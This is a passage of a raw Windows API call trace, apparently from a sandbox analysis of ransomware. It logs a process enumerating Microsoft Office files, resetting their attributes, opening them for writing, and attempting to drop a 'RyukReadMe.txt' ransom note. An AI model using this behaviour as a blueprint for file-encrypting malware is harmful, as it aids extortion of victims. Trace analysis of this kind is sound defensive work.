(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PE.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pe.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.267] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.267] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.267] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD", dwFileAttributes=0x80) returned 0 [0136.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PIPELINE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pipeline.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.268] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.269] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.269] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.270] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.270] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.271] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.271] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS", dwFileAttributes=0x80) returned 0 [0136.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.272] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.272] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.272] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.272] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.273] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.273] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.273] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.273] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.274] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.274] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.274] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.274] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.274] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PRIMARY.CSS", dwFileAttributes=0x80) returned 0 [0136.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PRIMARY.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\primary.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.275] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.275] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.275] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.275] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL", dwFileAttributes=0x80) returned 0 [0136.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.276] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.276] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.276] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSS", dwFileAttributes=0x80) returned 0 [0136.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.277] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.277] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.277] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.DOC", dwFileAttributes=0x80) returned 0 [0136.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.DOC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.278] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.PPT", dwFileAttributes=0x80) returned 0 [0136.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.PPT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.278] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.XLS", dwFileAttributes=0x80) returned 0 [0136.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLN.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottpln.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.279] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.279] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.279] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.DOC", dwFileAttributes=0x80) returned 0 [0136.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.DOC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.279] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.280] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.PPT", dwFileAttributes=0x80) returned 0 [0136.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.PPT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.280] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.280] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.280] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.XLS", dwFileAttributes=0x80) returned 0 [0136.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROTTPLV.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\prottplv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.281] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT", dwFileAttributes=0x80) returned 0 [0136.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchkey.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.281] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT", dwFileAttributes=0x80) returned 0 [0136.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlex.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.282] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.282] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.282] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT", dwFileAttributes=0x80) returned 0 [0136.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlts.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.283] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT", dwFileAttributes=0x80) returned 0 [0136.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHPHN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchphn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.284] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT", dwFileAttributes=0x80) returned 0 [0136.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchsrn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.284] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.284] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.284] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.284] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM", dwFileAttributes=0x80) returned 0 [0136.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.285] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.285] SetLastError (dwErrCode=0x0) [0136.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.286] GetLastError () returned 0x5 [0136.286] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.286] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.298] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.298] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.298] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.298] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME01.CSS", dwFileAttributes=0x80) returned 0 [0136.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME01.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme01.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, 